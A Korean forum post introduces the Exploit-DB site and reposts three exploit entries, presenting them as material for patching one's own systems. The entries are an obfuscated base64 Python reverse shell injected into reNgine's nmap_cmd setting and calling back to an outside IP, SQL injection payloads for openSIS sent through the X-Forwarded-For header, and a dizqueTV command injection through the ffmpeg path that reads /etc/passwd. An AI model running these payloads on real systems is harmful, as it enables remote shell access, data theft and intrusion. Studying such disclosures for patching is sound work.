[정보] 서버 취약점 정보 제공해주는 사이트
Exploit-DB는 펜 테스터, 연구자, 해킹을 위한 공개적인 취약점 정보와 공격 코드를 제공하는 웹사이트입니다
지피지기 백전백승(知彼知己 百戰百勝)이라고 내 취약점을 파악하여 보안 패치를 위해서 공유합니다.
2024-10-01 reNgine 2.2.0 - Command Injection (Authenticated) WebApps Multiple Caner Tercan
[code]
# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)
# Date: 2024-09-29
# Exploit Author: Caner Tercan
# Vendor Homepage: https://rengine.wiki/
# Software Link: https://github.com/yogeshojha/rengine
# Version: v2.2.0
# Tested on: macOS
POC :
1. Login the Rengine Platform
2. Click the Scan Engine
3. Modify any Scan Engine
4. I modified nmap_cmd parameters on yml config
5. Finally, add a target in the targets section, select the scan engine you edited and start scanning.
payload :
'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh #’
[/code]
2024-10-01 openSIS 9.1 - SQLi (Authenticated) WebApps PHP Devrim Dıragumandan
[code]
# Exploit Title: openSIS 9.1 - SQLi (Authenticated) # Google Dork: intext:"openSIS is a product" # Date: 09.09.2024 # Exploit Author: Devrim Dıragumandan (d0ub1edd) # Vendor Homepage: https://www.os4ed.com/ # Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1 # Version: 9.1 # Tested on: Linux A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. GET /Ajax.php?modname=x HTTP/1.1 --- Parameter: X-Forwarded-For #1* ((custom) HEADER) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae --- FIX: https://github.com/OS4ED/openSIS-Classic/pull/322
[/code]
2024-10-01 dizqueTV 1.5.3 - Remote Code Execution (RCE) WebApps JSP Ahmed Said Saud Al-Busaidi
[code]
# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE) # Date: 9/21/2024 # Exploit Author: Ahmed Said Saud Al-Busaidi # Vendor Homepage: https://github.com/vexorian/dizquetv # Version: 1.5.3 # Tested on: linux POC: ## Vulnerability Description dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers. ## STEPS TO REPRODUCE 1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'" 3. click on update 4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd
[/code]
게시판 목록
컴퓨터
| 번호 | 제목 | 글쓴이 | 날짜 | 조회 |
|---|---|---|---|---|
| 438 | 7년 전 | 3422 | ||
| 437 | 8년 전 | 1716 | ||
| 436 | 8년 전 | 2914 | ||
| 435 | 8년 전 | 2769 | ||
| 434 | 8년 전 | 3414 | ||
| 433 | 8년 전 | 5206 | ||
| 432 | 8년 전 | 1967 | ||
| 431 | 8년 전 | 1800 | ||
| 430 |
sks812
|
8년 전 | 2139 | |
| 429 | 8년 전 | 1861 | ||
| 428 | 8년 전 | 2209 | ||
| 427 | 8년 전 | 3099 | ||
| 426 |
프로그래머7
|
8년 전 | 3659 | |
| 425 | 8년 전 | 2510 | ||
| 424 | 8년 전 | 2212 | ||
| 423 | 8년 전 | 2474 | ||
| 422 | 8년 전 | 2481 | ||
| 421 | 8년 전 | 2575 | ||
| 420 | 8년 전 | 3198 | ||
| 419 | 8년 전 | 8228 | ||
| 418 |
프로그래머7
|
8년 전 | 3119 | |
| 417 |
프로그래머7
|
8년 전 | 2868 | |
| 416 |
프로그래머7
|
8년 전 | 2084 | |
| 415 |
프로그래머7
|
8년 전 | 2315 | |
| 414 | 8년 전 | 2091 | ||
| 413 | 8년 전 | 1655 | ||
| 412 |
프로그래머7
|
8년 전 | 2854 | |
| 411 |
프로그래머7
|
8년 전 | 4713 | |
| 410 | 8년 전 | 3327 | ||
| 409 |
프로그래머7
|
8년 전 | 2833 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기